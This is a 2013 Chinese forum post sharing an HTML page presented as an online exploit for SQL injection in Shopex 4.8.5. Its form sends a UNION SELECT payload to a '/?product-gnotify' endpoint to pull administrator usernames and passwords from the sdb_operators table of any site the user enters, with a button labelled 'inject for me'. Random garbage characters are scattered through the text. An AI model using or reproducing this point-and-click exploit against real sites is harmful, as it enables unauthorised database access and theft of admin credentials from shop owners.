<center>
# Y8 a& S; ?7 [<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>7 z: @) I$ p4 f1 o& A
<form action="" method="post" name="submit_url">; d( H8 i1 v) V( e1 p7 j+ I
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>; _! E% f$ H/ J4 E6 {& r+ a
<input type="hidden" name="goods[goods_id]" value="3">9 j! o9 W7 H, r; G+ A$ J n
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">- N/ Z' N% x, B! v3 f8 T! Z- T
<input type="submit" value="给我注入" onclick=fsubmit()>
4 ?( I* y# V, F8 ?7 W</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
+ {, |" r) v& y. H% a1 v5 J" S& Q. B; m: D
<script>
$ u5 L) A2 n7 i1 f# Yfunction fsubmit(){ # J3 _' V+ \. B8 K) ^' {" @
form = document.forms[0];
2 }$ o2 g% t) t! b7 |form.action = form.url.value+'/?product-gnotify'; 6 b* V" k; N& D" S
form.submit(); 4 w$ r$ E9 n r z4 a: k) z) Q% }
} 1 h4 f, d. P v1 \6 h, u, z& }
</script>- B4 U H1 c, n& E4 C4 }
|
发表于 2013-1-23 09:20:52
收藏
分享
支持
反对